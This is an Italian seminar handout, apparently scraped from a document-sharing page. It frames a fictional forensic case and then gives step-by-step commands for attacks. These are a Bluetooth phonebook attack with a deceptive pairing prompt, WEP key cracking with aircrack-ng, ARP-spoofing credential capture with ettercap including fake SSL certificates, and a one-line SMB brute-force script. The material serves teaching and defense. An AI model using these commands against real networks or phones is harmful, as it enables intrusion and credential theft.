HACK ATTACK IL LABORATORIO ATTENZIONE

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "HACK ATTACK IL LABORATORIO ATTENZIONE"

Transcript

1 HACK ATTACK IL LABORATORIO ATTENZIONE I L P R E S E N T E D O C U M E N T O H A SCOPO ESCLUSIVAMENTE DIDATTICO ED INFORMATIVO, L UTILIZZO NON AUTORIZZATO DELLE TECNICHE E M E T O D O L O G I E D I S E G U I T O ILLUSTRATE SU DISPOSITIVI ALTRUI È SEVERAMENTE VIETATO E VIENE PERSEGUITO A NORMA DI LEGGE

2 Introduzione Vogliamo innanzitutto ringraziare i numerosissimi partecipanti presenti alla sessione di laboratorio e per le tante di gradimento che abbiamo ricevuto. Quando abbiamo pensato alla realizzazione del laboratorio, la problematica principale nella quale ci siamo subito imbattuti è stata quella di rendere interessante e leggera la sessione, considerando l orario dell intervento (tardo pomeriggio) e il livello di attenzione dei partecipanti sottoposti ad una intensa giornata di relazioni. Abbiamo così deciso di presentare alcune delle tecniche più spettacolari e degli attacchi più interessanti attraverso la recitazione di una storia immaginaria elaborata però da esperienze professionali realmente accadute. I temi trattati non hanno avuto certamente un approccio tecnico approfondito ma il nostro obiettivo era quello di portare a conoscenza dei partecipanti dell esistenza di tali tecniche e minacce cercando di far capire le modalità di innesco e realizzazione senza entrare nel dettaglio. Questo breve documento ha proprio lo scopo di approfondire tecnicamente quello che vi abbiamo mostrato nel laboratorio del seminario. La storia Arruzzoli e Orlandi sono due consulenti per la sicurezza informatica che collaborano spesso alla realizzazione di soluzioni per la sicurezza ICT di aziende private ed enti governativi. Un giorno ricevono la telefonata di un loro cliente, l amministratore delegato dell AXAN Technology (azienda farmaceutica), il quale gli chiede di recarsi subito al centro ricerche AXAN per cercare di risolvere un grave problema di sicurezza. Orlandi arriva per primo al centro ricerche e chiede informazioni sull accaduto all amministratore. L amministratore gli spiega che alcune ore fà la sicurezza interna ha notato un auto che sostava nel parcheggio privato dell AXAN con all interno una persona che stava utilizzando un computer portatile in modo sospetto. Gli agenti della sicurezza si sono avvicinati e hanno notato che la persona stava utilizzando una macchina virtuale con un sistema operativo client della AXAN ma costui non era un dipendente AXAN né un soggetto autorizzato all utilizzo dei sistemi informatici AXAN; hanno così pregato la persona a seguirli nel centro ricerche per capire meglio quanto stava accadendo. La persona li segue senza opporre resistenza e dopo una verifica effettuata dall amministratore del sistema ICT dell AXAN risulta che l immagine virtuale del client trovata in possesso della persona, apparteneva ad un portatile rubato alcuni mesi prima ad un ricercatore della AXAN. La persona si rifiuta di rispondere alle domande ma alla richiesta di poter visionare il portatile, non fà nessuna obiezione, al contrario, ci tiene che i tecnici AXAN lo esaminino. Questo comportamento ha insospettito l amministratore delegato che vuole cercare di capire cosa realmente può aver fatto quella persona prima di intraprendere qualsiasi azione legale. Orlandi si mette al lavoro e dopo una rapida investigazione scopre che la segretaria dell amministratore conosce quella persona in quanto frequentano entrambi la stessa palestra e si ricorda che una sera spettegolando sui propri capi gli aveva confidato che l amministratore dell AXAN aveva il pallino di conservare le credenziali di accesso nella rubrica dei nomi del suo cellulare confondendoli con i nomi reali. Orlandi chiede all mministratore se aveva notato nei giorni precedenti qualcosa di strano sul suo cellulare e l amministratore risponde che il giorno prima, mentre era in riunione presso un azienda concorrente, ha ricevuto un messaggio che gli comunicava la ricarica di 20 euro sul proprio cellulare, istintivamente ha accettato la ricarica ma successivamente, dopo la riunione, ha verificato che non gli era stata accreditata nessuna ricarica ma non ha fatto caso più di tanto all accaduto, pensando ad un errore del gestore telefonico. Orlandi si fà consegnare il cellulare ed effettua una copia (bitstream image) dell immagine virtuale del client per iniziare l analisi tecnica; nel frattempo arriva

3 Arruzzoli e Orlandi lo aggiorna sui dettagli. Iniziano così ad analizzare tutte le informazioni che sono riusciti a raccogliere per cercare di capire se la persona è riuscita a trafugare informazioni riservate. Analizzando il telefono cellulare Orlandi e Arruzzoli verificano la storia del messaggio di ricarica e dopo un breve controllo sul modello e la versione del software capiscono che il sistema bluetooth poteva essere aggirato tramite apposite tecniche per carpire la rubrica telefonica e lo dimostrano (Bluetooth Attack). Successivamente analizzano il luogo dove si trovava l automobile e notano che il segnale della rete wireless della AXAN è raggiungibile. Analizzando la connessione si accorgono che il sistema wireless utilizza crittografia WEP facilmente attaccabile ed effettuano una dimostrazione pratica (WEP Attack). Una volta entrati nella rete AXAN provano ad immaginare cosa possa aver fatto la persona sospetta e analizzando il file system del client virtuale utilizzato scoprono che la persona aveva installato sia aircrack che ettercap. Il programma aircrack conferma loro la teoria dell accesso alla rete wireless tramite attacco al sistema wep mentre la presenza di ettercap lascia supporre la possibilità che la persona sospetta possa aver carpito tramite questo tool crdenziali di autenticazione a vari sistemi della rete AXAN, quindi provano a ripetere l attacco con ettercap per capire il livello di vulnerabilità presente (MAN IN THE MIDDLE ATTACK). Dal risultato ottenuto con le varie prove, Orlandi ed Arruzzoli si rendono conto delle possibili informazioni che la persona può aver acquisito e cercano di capire dove queste informazioni possano essere state nascoste o inviate. Attraverso i prodotti di Log Management e Network Forensic utilizzati dall AXAN verificano che diverse informazioni riservate sono state scaricate sul client virtuale dai sistemi AXAN ma non risulta nessuna trasmissione all esterno della rete AXAN da quel client. Questo fa supporre ad Arruzzoli ed Orlandi che le informazioni siano ancora presenti nel client o siano state cancellate. Provano prima a verificare se si trovano tracce di file cancellati attraverso l utilizzo combinato dei tool Sleuthkit e Autopsy, ma il risultato è negativo, considerando però la possibilità che la persona sospetta possa aver utilizzato tecniche steganografiche per nascondere le informazioni, Orlandi ed Arruzzoli utilizzano un tool realizzato da loro per verificare l esistenza di eventuali presenze steganografiche conosciute nel file system del client AXAN. Prima analizzano (come possibili contenitori) le immagini presenti nel sistema ma il risultato è negativo ed infine analizzano il file system NTFS: in particolare gli attributi Alternate Data Stream presenti (EHG2- Stegano Tool). l esame risulta positivo, infatti vengono ritrovati ed estratti tre file : brute.bat rubrica.txt pentax.txt Il primo file brute.bat : for /f "tokens=1,2 delims= " %%i in (rubrica.txt) do net use \\AXAN-SRV\c$ %%j /u:%%i è un semplice ma funzionale script che esegue un attacco di forza bruta sfruttando una libreria di username e password presenti nel file rubrica.txt. Analizzando il file rubrica.txt : m.rossi f.bianchi Orlandi ed Arruzzoli si accorgono che le credenziali presenti nel file non sono nient altro che la rubrica telefonica del cellulare dell amministratore delegato. A questo punto risulta chiaro che la persona sospetta nei giorni precedenti aveva effettuato un attacco bluetooth al cellulare dell amministratore copiando i nominativi presenti nella rubrica telefonica e successivamente utilizzandoli per lanciare un attacco di forza bruta nella rete AXAN per accedere ai server AXAN. Il terzo file pentax.txt conferma definitivamente l ipotesi fatta, in quanto contiene informazioni riservate su un nuovo tipo di medicinale prodotto dalla AXAN a cui poteva accedere solo l amministratore delegato con le sue credenziali. Orlandi ed Arruzzoli redigono una relazione tecnica in merito a quanto scoperto all amministratore delegato che intraprende un azione legale. Alcuni giorni dopo si scoprirà che la persona sospetta era stata ingaggiata dalla ditta concorrente per acquisire informazioni riservate sul nuovo prodotto della AXAN. Fine della storia.

4 Strumenti utilizzati Durante il laboratorio sono stati utilizzati diversi tool software su sistemi operativi Linux e Microsoft. In particolare per il Vulnerability Assessement è stato mostrato il prodotto GFiLANguard della GFi gli altri software utilizzati sono presenti in una suite Linux chiamata BackTrack ( BackTrack è un live CD basato su sistema operativo Linux (Slax) che contiene una collezione di tool per la verifica della sicurezza dei sistemi ICT. Per la steganografia è stato realizzato un tool freeware (EHG2-Stegano) che dimostra alcune interessanti tecniche steganografiche. Bluetooth Attack (helomoto) L attacco al bluetooth presentato nella sessione di laboratorio è stato scoperto e realizzato da Adam laurie direttore della Bunker Secure Hosting Ltd ed è stato chiamato helomoto in riferimento ad alcuni modelli di cellulari della Motorola su cui è stato possibile realizzare questo tipo di attacco. Helomoto è una combinazione di tre attacchi : Bluesnarf Bluesnarf è stato identificato da Marcel Holtmann nel settembre del 2003 ed è, probabilmente, il più famoso attacco bluetooth, in quanto ha evidenziato una significativa falla nei sistemi di autenticazione bluetooth. L attaccante deve collegarsi a OBEX Push Profile (OPP), servizio pensato per lo scambio di biglietti da visita elettronici e altre informazioni. Nella maggior parte dei casi, questo servizio non richiede l'autenticazione. L attaccante invia una richiesta GET al servizio OBEX della vittima per conoscere nomi di file noti (ad es. la rubrica : telecom/pb.vcf ), in caso di cattiva esecuzione del firmware del telefono cellulare, il malintenzionato è in grado di recuperare tutti i file il cui nome è noto o sia indovinato correttamente. Bluebug Attacco che permette l accesso, il download non autorizzato della rubrica telefonica, degli sms, la possibilità di inviare SMS ed effettuare chiamate telefoniche attraverso l utilizzo di comandi AT in maniera trasparente al proprietario del cellulare. Social engineering/phishing In alcuni modelli di cellulari la connessione non avviene in maniera automatica, in questo caso si deve indurre l utente ad accettare la connessione, mascherando la richiesta in maniera subdola. Gli strumenti utilizzati per realizzare questo attacco sono un device usb bluetooth, la security suite backtrack e il codice dell exploit helomoto( elomoto.html ). Nel laboratorio per prima cosa abbiamo connesso il device bluetooth usb al portatile e verificato il riconoscimento da parte del sistema operativo tramite il comando : hciconfig

5 successivamente abbiamo attivato il device bluetooth usb con il comando : hciconfig hci0 up Per identificare i device con bluetooth attivo e configurati per essere visibili ad altri dispositivi abbiamo utilizzato il comando : hcitool scan In realtà per poter trovare tutti i device bluetooth disponibili ( visibili e non ) è necessario effettuare una scansione di forza bruta su un range di mac-address, operazione onerosa in termini di tempo; alcuni ricercatori hanno realizzato un sistema hardware e software denominato bluebag che permette la scansione contemporanea di più mac-address ( per saperne di più: ). Per effettuare questo tipo di scansione è possibile utilizzare il tool btscanner presente nella suite backtrack e selezionare l opzione brute force (b) inserendo il range mac-address desiderato. Una volta terminata la scansione e identificato un dispositivo (nel laboratorio del seminario veniva preso come esempio un telefono cellulare della Motorola modello L6) viene effettuato un primo tentativo di connessione attraverso il comando : rfcomm connect 0 < mac-address della vittima> 3 Ident. Device bluetooth Canale bluetooth n.3

6 L interfaccia bluetooth del Motorola presenta due voice gateways uno richiede l autenticazione di accoppiamento (pairing) l altro no, nello specifico l Headset Audio Gateway presente sul canale 3 non la richiede fino a quando non viene effettuata la connessione. Tuttavia il device dell attaccante deve essere presente nella history list del device vittima, altrimenti non potrà connettersi al canale 3. L esecuzione del codice helomoto.c, precedentemente compilato, sul canale 8 risolve questo problema : helomoto plant < mac-address della vittima> 8 A questo punto è necessario indurre l utente ad accettare la connessione, per fare questo si prepara attraverso la configurazione del nome dell interfaccia bluetooth un messaggio subdolo che induca l utente a concedere la connessione : hciconfig hci0 name `perl -e 'print "SchedaSIM\x0dNonAttiva\x0dAttivare?\x0d\x0d"'` e ripetiamo il comando : rfcomm connect 0 < mac-address della vittima> 3 Il device della vittima visualizzerà il messaggio : SchedaSIM NonAttiva Attivare? Se viene accettata la connessione, l attaccante potrà interagire con i comandi AT sul device della vittima con un programma terminal configurando il device usb come una porta seriale (ad es. Cutecom) :

7 WEP Attack Il WEP (Wired Equivalent Privacy) è un algoritmo opzionale dello standard IEEE b, che effettua la crittografia del dato prima che venga irradiato nell'etere. Il WEP utilizza un algoritmo RC4 con chiave a 64 bit, 128 e 256 bit. L'aumento delle velocità di trasmissione e le relative piccole dimensioni dei Vettori di Inizializzazione (IV: stringhe di bit usate per rendere casuale parte della chiave) utilizzate nel WEP, fanno sì che in condizioni di traffico normale sia possibile per un attaccante ottenere la chiave di codifica, e quindi l accesso alla rete e alle informazioni trasmesse in un lasso di tempo relativamente breve (un paio d ore). L aumento dei bit di codifica serve solo a ritardare l'accesso alla rete da parte di un attaccante (sarebbe più indicato un cambio frequente della chiave wep). Nel laboratorio del seminario si è utilizzato il tool aricrack-ng per effettuare l attacco ad una rete WEP a 128 bit. Gli strumenti utilizzati per realizzare questo attacco sono una scheda di rete Prism2 con dei driver aggiornati per permettere l injection dei pacchetti (per saperne di più: e la security suite backtrack. L attacco viene portato in 4 fasi Fase 1 Scanning Si effettua una scansione per identificare eventuali reti, su che canale sono e se ci sono client connessi; per fare questa operazione eseguiamo il comando : airodump-ng <interfaccia> (ad es. airodump-ng eth1) Una volta identificata la rete vengono selezionate le seguenti informazioni: BSSID dell AP (mac-address Access Point) ESSID dell AP (nome identificativo Access Point) Channel (il numero del canale di trasmissione) SSID dei client connessi (mac address dei client) BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:E0:XX:XX:XX:XX WEP WEP AXAN-AP12 BSSID STATION PWR Lost Packets Probes 00:E0:XX:XX:XX:XX 00:0E:35:XX:XX:XX AXAN-AP12

8 Fase 2 Acquisizione dei pacchetti IV Eseguiamo nuovamente airodump-ng con i seguenti paramentri: airodump-ng -c <canale> -b <BSSID> -w <file.ivs> <interfaccia> esempio : airodump-ng --bssid 00:E0:XX:XX:XX:XX -c 6 --write axan-ap12.dump eth1 In questo modo effettuiamo la cattura dei pacchetti IV sul file axan-ap12.dump. Per effettuare la crittanalisi e quindi individuare la chiave, dobbiamo archiviare circa pacchetti IV (varia in base al numero di bit utilizzati per la crittografia). Per diminuire il tempo di attesa è necessario generare del traffico che permetta di acquisire più pacchetti possibili nel minor tempo, quindi si utilizza il tool aireplay-ng. Questo tool dispone di varie funzionalità, nel nostro caso lo imposteremo con il parametro -3 che di fatto lo rende un generatore di richieste ARP, ad ogni richiesta la base (ad es. l Access Point AXAN-AP12) genera un nuovo vettore di inizializzazione. Il comando viene impostato con i seguenti parametri aireplay-ng -3 -b 00:E0:XX:XX:XX:XX -h 00:0E:35:XX:XX:XX eth1 Mac-address AXAN-AP12 Mac-address di un client connesso Fase 3 Analisi dei pacchetti IV Con aircrack-ng si analizzano i pacchetti IV per decifrare la chiave. Apriamo un nuova console ed eseguiamo il comando : aircrack-ng <file.ivs> Il tempo varia anche in base alla lunghezza della password.

9 Raggiunto il numero di pacchetti sufficienti l algoritmo riesce a trovare la chiave. Fase 4 Configurazione della scheda di rete A questo punto si inserisce la chiave nella configurazione della scheda di rete wireless con il comando : iwconfig eth1 mode Managed Key 1A:43:DC:BB:4C:9D:8B:47:C5:47:CC:55:CD nella maggior parte dei casi è sufficiente eseguire una richiesta dhcp sull interfaccia di rete wireless per ottenere i parametri di configurazione e quindi accedere alla rete: dhcpcd eth1 Man In The Middle attack (MITM) Il MITM è un attacco nel quale l'attaccante è in grado di leggere, inserire o modificare a piacere, le informazioni che vengono scambiate tra due parti senza che nessuna delle due sia in grado di sapere se il collegamento sia stato compromesso. L'attaccante deve essere in grado di osservare e intercettare il transito delle informazioni tra le due vittime. Nel laboratorio del seminario è stato dimostrato come attraverso l uso del tool software ettercap sia possibile per un attaccante connesso ad una rete effettuare un atttacco MITM e carpire informazioni relative alle credenziali degli utenti presenti sulla medesima rete. Per realizzare questo attacco è stata utilizzata la security suite backtrack che contiene il tool software ettercap.

10 Una volta avviato il tool ettercap per prima cosa è necessario selezionare l interfaccia di rete su cui si vuole analizzare il traffico. Una volta selezionata, il menu di ettercap mostrerà ulteriori funzionalità. A questo punto si deve effettuare uno scanning della rete per individuare i computer attivi. A tutti i computer individuati, ettercap, invierà un arp spoofing impostando l opzione Sniff remote connections nel menu Mitm:

11 Una volta attivato ( dal menu Start->Start Sniffing), Ettercap comincerà ad inviare delle richieste arp ad ogni singolo computer individuato, associando il proprio mac-address con tutti gli altri indirizzi dei computer attivi. In questo modo tutte le richieste effettuate dai computer verso altri computer saranno dirottate prima verso l attaccante e solo successivamente saranno redirette al vero destinatario; in questo modo l attaccante ha modo di analizzare ed eventualmente manipolare le informazioni. Lista arp di un client prima dell arp spoofing Lista arp di un client dopo dell arp spoofing In modalità sniffing, ettercap analizza tutto il traffico e quando individua la trasmissioni di credenziali le filtra e le memorizza. E interessante notare la capacità di ettercap di acquisire le credenziali trasmesse anche su canali SSL. In particolare nel caso ettercap trasmette al client un falso certificato digitale che utilizza successivamente per decriptare le credenziali inviate, il tutto in maniera trasparente all utente:

12 Esempi di Steganografia ( EHG2-Stegano Tool ) Il tool utilizzato nel laboratorio del seminario è stato realizzato dall EHG2 (Ethical Hacker Guardian Group) un gruppo di ricerca fondato da Francesco Arruzzoli e Cristiano Orlandi che ha lo scopo di analizzare ed approfondire la conoscenza sulle nuove tecnologie, in particolare sulla loro applicazione, sicurezza ed affidabilità in ambito ICT. Steganografia con le Immagini Steganografia realizzata con gli Alternate Data Stream Il tool permette di utilizzare due tecniche di steganografia quella applicata alla possibilità di inserie inserire un file generico dentro immagini Bitmap utilizzando l algoritmo LSB (Least Significant Bit) algoritmo di inserimento nel bit meno significativo e quella che utilizza la proprietà Alternate Data Stream presente nel file system NTFS dei sistemi operativi Microsoft. Utilizzo del tool con la metodologia LSB Selezionare la Tab LSB Image Steganography successivamente la sotto tab Encrypt. Premere il pulsante Select image.. per selezionare l immagine contenitore e il pulsante Select File.. per selezionare il file da inserire nell immagine contenitore.

13 L indicatore Container Capacity indicherà la % occupata dal file nell immagine contenitore. Per generare l immagine bmp con il file steganografato premere il pulsante Execute Steganography. Per estrarre un file steganografato dall immagine contenitore selezionare la Tab LSB Image Steganography la successivamente la sotto tab Decrypt. Premere il pulsante Select Image.. e selezionare l immagine contenitore, il nome del file nascosto e le sue dimensioni appariranno nella sezione File Contained. Per estrarre il file è sufficiente premere il pulsante Extract File >>.

14 Utilizzo del tool con gli Alternate Data Stream Selezionare la Tab Alternate Data Stream Steganography,selezionare il file contenitore a cui associare il file nascosto tramite ADS, premendo il pulsante relativo alla casella di testo Select file to link ADS, successivamente premere il pulsante relativo alla casella di testo Copy file to an existing ADS per associare il file da nascondere, oppure selezionando l opzione Create a text ADS file è possibile creare un file di testo da associare, semplicemente inserendo il nome del file nella casella di testo ADS file name e il testo da nascondere nella casella di testo Text Content. Per creare l ADS premere il pulsante Make ADS. E possibile associare più file ADS allo stesso file contenitore. Anche cambiando il nome al file contenitore il link ai file ADS rimane ma si perde se viene effettuata una copia su un altro file system.

15 Per ricercare gli ADS presenti nel file system inserire il percorso di ricerca iniziale nella casella di testo Search Path e premere il pulsante Search ADS. Eventuali file ADS saranno visualizzati nella lista Found Files; per aprire, estrarre o eliminare il file ADS selezionarlo dalla lista, premere il plusante destro del mouse e selezionare l opzione desiderata sul menù che appare. Quello che non avete visto ma che è accaduto Durante lo svolgimento del laboratorio, al di là di problemi tecnici tipici della diretta come il filmato iniziale che dalla sala regia stentava a partire o le luci che non si accendevano, per assicurarci la miglior riuscita delle dimostrazioni e ipotizzando la possibilità che qualcuno dal pubblico per spirito goliardico potesse tentare di interferire in qualche modo, abbiamo creato delle Honeypot (in breve: dispositivo che funge da specchietto per le allodole ) per i dispositivi wireless alfine di deviare l attenzione da quelli realmente utilizzati. Il risultato è stato sorprendente nei primi dieci minuti di laboratorio abbiamo registrato sulla Honeypot relativa ai dispositivi bluetooth 5 tentativi di attacco e diversi download dei file civetta. Avremmo voluto discuterne alla fine del seminario ma purtroppo per motivi di tempo non abbiamo potuto, sarebbe stato un interessante approfondimento. Nel ringraziarvi nuovamente per l interesse e la partecipazione, speriamo che il presente documento sia un utile compendio a quanto visto durante il seminario. Distinti Saluti Francesco Arruzzoli (DiNets srl) Cristiano Orlandi (Winitalia)

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0

NOTE OPERATIVE. Prodotto Inaz Download Manager. Release 1.3.0 Prodotto Inaz Download Manager Release 1.3.0 Tipo release COMPLETA RIEPILOGO ARGOMENTI 1. Introduzione... 2 2. Architettura... 3 3. Configurazione... 4 3.1 Parametri di connessione a Internet... 4 3.2

Dettagli

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) ------------------------------------------------- GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)... 1 Installazione Billiards Counter... 2 Primo avvio e configurazione

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Accreditamento al SID

Accreditamento al SID Accreditamento al SID v. 3 del 22 ottobre 2013 Guida rapida 1 Sommario Accreditamento al SID... 3 1. Accesso all applicazione... 4 2. Richieste di accreditamento al SID... 6 2.1. Inserimento nuove richieste...

Dettagli

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48 ANALISI FORENSE irecovery_analisi_forence.indd 1 21/01/14 17:48 COSA è L informatica forense è la scienza che studia l individuazione, la conservazione, la protezione, l estrazione, la documentazione,

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

LA GESTIONE DELLE VISITE CLIENTI VIA WEB

LA GESTIONE DELLE VISITE CLIENTI VIA WEB LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici

Dettagli

1) GESTIONE DELLE POSTAZIONI REMOTE

1) GESTIONE DELLE POSTAZIONI REMOTE IMPORTAZIONE ESPORTAZIONE DATI VIA FTP Per FTP ( FILE TRANSFER PROTOCOL) si intende il protocollo di internet che permette di trasferire documenti di qualsiasi tipo tra siti differenti. Per l utilizzo

Dettagli

FPf per Windows 3.1. Guida all uso

FPf per Windows 3.1. Guida all uso FPf per Windows 3.1 Guida all uso 3 Configurazione di una rete locale Versione 1.0 del 18/05/2004 Guida 03 ver 02.doc Pagina 1 Scenario di riferimento In figura è mostrata una possibile soluzione di rete

Dettagli

Software Servizi Web UOGA

Software Servizi Web UOGA Manuale Operativo Utente Software Servizi Web UOGA S.p.A. Informatica e Servizi Interbancari Sammarinesi Strada Caiese, 3 47891 Dogana Tel. 0549 979611 Fax 0549 979699 e-mail: info@isis.sm Identificatore

Dettagli

GESGOLF SMS ONLINE. Manuale per l utente

GESGOLF SMS ONLINE. Manuale per l utente GESGOLF SMS ONLINE Manuale per l utente Procedura di registrazione 1 Accesso al servizio 3 Personalizzazione della propria base dati 4 Gestione dei contatti 6 Ricerca dei contatti 6 Modifica di un nominativo

Dettagli

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey DA OGGI NON IMPORTA DOVE SEI, IL TUO PC DELL UFFICIO E SEMPRE A TUA DISPOSIZIONE! Installa solo un semplice programma (nessun hardware necessario!), genera la tua chiavetta USB, e sei pronto a prendere

Dettagli

GUIDA UTENTE MONEY TRANSFER MANAGER

GUIDA UTENTE MONEY TRANSFER MANAGER GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2) GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2)... 1 Installazione... 2 Prima esecuzione... 5 Login... 7 Funzionalità... 8 Anagrafica... 9 Registrazione

Dettagli

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com 2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

Airone Gestione Rifiuti Funzioni di Esportazione e Importazione

Airone Gestione Rifiuti Funzioni di Esportazione e Importazione Airone Gestione Rifiuti Funzioni di Esportazione e Importazione Airone Funzioni di Esportazione Importazione 1 Indice AIRONE GESTIONE RIFIUTI... 1 FUNZIONI DI ESPORTAZIONE E IMPORTAZIONE... 1 INDICE...

Dettagli

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Manuale Amministratore Legalmail Enterprise Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Pagina 2 di 16 Manuale Amministratore Legalmail Enterprise Introduzione a Legalmail Enterprise...3

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

Manuale Utente. Gestione Richieste supporto BDAP. Versione 1.0

Manuale Utente. Gestione Richieste supporto BDAP. Versione 1.0 Manuale Utente Gestione Richieste supporto BDAP Versione 1.0 Roma, Settembre 2015 1 Indice 1 Generalità... 3 1.1 Scopo del documento... 3 1.2 Versioni del documento... 3 1.3 Documenti di Riferimento...

Dettagli

Manuale LiveBox APPLICAZIONE ANDROID. http://www.liveboxcloud.com

Manuale LiveBox APPLICAZIONE ANDROID. http://www.liveboxcloud.com 2014 Manuale LiveBox APPLICAZIONE ANDROID http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia

Dettagli

START Easy GO! Il gestionale sempre in tasca! Procedura di aggiornamento. Documentazione utente Pagina 1 di 18

START Easy GO! Il gestionale sempre in tasca! Procedura di aggiornamento. Documentazione utente Pagina 1 di 18 Procedura di aggiornamento Il gestionale sempre in tasca! Documentazione utente Pagina 1 di 18 Sommario Avvertenze... 3 Operazioni preliminari... 3 Salvataggi... 3 Download aggiornamenti... 5 Aggiornamento

Dettagli

MANUALE D'USO DEL PROGRAMMA IMMOBIPHONE

MANUALE D'USO DEL PROGRAMMA IMMOBIPHONE 1/6 MANUALE D'USO DEL PROGRAMMA IMMOBIPHONE Per prima cosa si ringrazia per aver scelto ImmobiPhone e per aver dato fiducia al suo autore. Il presente documento istruisce l'utilizzatore sull'uso del programma

Dettagli

GUIDA UTENTE PRIMA NOTA SEMPLICE

GUIDA UTENTE PRIMA NOTA SEMPLICE GUIDA UTENTE PRIMA NOTA SEMPLICE (Vers. 2.0.0) Installazione... 2 Prima esecuzione... 5 Login... 6 Funzionalità... 7 Prima Nota... 8 Registrazione nuovo movimento... 10 Associazione di file all operazione...

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC BMSO1001 Virtual Configurator Istruzioni d uso 02/10-01 PC 2 Virtual Configurator Istruzioni d uso Indice 1. Requisiti Hardware e Software 4 1.1 Requisiti Hardware 4 1.2 Requisiti Software 4 2. Concetti

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

Configurazione di Outlook Express

Configurazione di Outlook Express OUTLOOK Outlook Express è il client di posta elettronica sviluppato da Microsoft, preinstallato su sistemi operativi Windows a partire da Windows 98 fino all'uscita di Windows XP. Con l'arrivo di Windows

Dettagli

SOMMARIO... 3 INTRODUZIONE...

SOMMARIO... 3 INTRODUZIONE... Sommario SOMMARIO... 3 INTRODUZIONE... 4 INTRODUZIONE ALLE FUNZIONALITÀ DEL PROGRAMMA INTRAWEB... 4 STRUTTURA DEL MANUALE... 4 INSTALLAZIONE INRAWEB VER. 11.0.0.0... 5 1 GESTIONE INTRAWEB VER 11.0.0.0...

Dettagli

Proteggiamo il PC con il Firewall di Windows Vista

Proteggiamo il PC con il Firewall di Windows Vista Proteggiamo il PC con il Firewall di Windows Vista Il momento in cui un computer è più a rischio e soggetto ad attacchi informatici, è quando è connesso a internet. Per proteggere il nostro PC ed evitare

Dettagli

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014)

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Il software per gli esami ICON può essere eseguito su qualunque computer dotato di Java Virtual Machine aggiornata.

Dettagli

Manuale Utente. Gestione Richieste supporto Data Warehouse. Della Ragioneria Generale dello Stato. Versione 1.0. Roma, Ottobre 2015

Manuale Utente. Gestione Richieste supporto Data Warehouse. Della Ragioneria Generale dello Stato. Versione 1.0. Roma, Ottobre 2015 Manuale Utente Gestione Richieste supporto Data Warehouse Della Ragioneria Generale dello Stato Versione 1.0 Roma, Ottobre 2015 1 Indice 1 Generalità... 3 1.1 Scopo del documento... 3 1.2 Versioni del

Dettagli

Manuale LiveBox APPLICAZIONE ANDROID. http://www.liveboxcloud.com

Manuale LiveBox APPLICAZIONE ANDROID. http://www.liveboxcloud.com 2014 Manuale LiveBox APPLICAZIONE ANDROID http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia

Dettagli

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

